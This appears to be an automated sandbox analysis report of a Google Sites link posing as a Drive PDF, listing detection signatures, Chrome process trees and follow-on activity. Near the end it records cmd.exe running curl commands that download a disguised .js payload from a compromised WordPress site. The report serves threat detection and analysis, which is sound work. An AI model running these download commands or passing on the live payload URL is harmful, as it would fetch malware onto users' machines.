Analysis
-
max time kernel
200s -
max time network
183s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
08/05/2025, 07:27
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://sites.google.com/view/drive-cx8JrJ/pdf?hid=68545392
Resource
win10v2004-20250502-en
3 signatures
150 seconds
General
-
Target
https://sites.google.com/view/drive-cx8JrJ/pdf?hid=68545392
Score
6/10
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 2 sites.google.com 4 sites.google.com 5 sites.google.com 35 drive.google.com 36 drive.google.com -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 3256 wrote to memory of 3832 3256 chrome.exe 94 PID 3256 wrote to memory of 3832 3256 chrome.exe 94 PID 3432 wrote to memory of 1572 3432 cmd.exe 121 PID 3432 wrote to memory of 1572 3432 cmd.exe 121 PID 3432 wrote to memory of 5040 3432 cmd.exe 122 PID 3432 wrote to memory of 5040 3432 cmd.exe 122 PID 3432 wrote to memory of 4300 3432 cmd.exe 123 PID 3432 wrote to memory of 4300 3432 cmd.exe 123 PID 3432 wrote to memory of 5104 3432 cmd.exe 124 PID 3432 wrote to memory of 5104 3432 cmd.exe 124
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://sites.google.com/view/drive-cx8JrJ/pdf?hid=685453921⤵
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb440bdcf8,0x7ffb440bdd04,0x7ffb440bdd102⤵PID:3832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --field-trial-handle=5600,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5664 /prefetch:11⤵PID:644
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --field-trial-handle=5392,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5792 /prefetch:11⤵PID:5040
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --field-trial-handle=5992,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5968 /prefetch:11⤵PID:2740
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --field-trial-handle=6132,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5996 /prefetch:11⤵PID:4720
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --string-annotations --field-trial-handle=6328,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=6324 /prefetch:81⤵PID:976
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --string-annotations --field-trial-handle=6336,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3320 /prefetch:81⤵PID:4068
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --string-annotations --field-trial-handle=6352,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3200 /prefetch:81⤵PID:2900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=4560,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4512 /prefetch:81⤵PID:3272
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1376
-
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe"1⤵PID:2252
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\system32\curl.execurl.exe -s -o amk57qsh30t33t.js 'https://maconsmallbusinesses.com/wp-content/uploads/2018/08/urobenzoicHQ7v.php'2⤵PID:1572
-
-
C:\Windows\system32\curl.execurl.exe2⤵PID:5040
-
-
C:\Windows\system32\curl.execurl.exe -s -o amk57qsh30t33t.js 'https://maconsmallbusinesses.com/wp-content/uploads/2018/08/urobenzoicHQ7v.php'2⤵PID:4300
-
-
C:\Windows\system32\curl.execurl.exe -s -o amk57qsh30t33t.js 'https://maconsmallbusinesses.com/wp-content/uploads/2018/08/urobenzoicHQ7v.php' -v2⤵PID:5104
-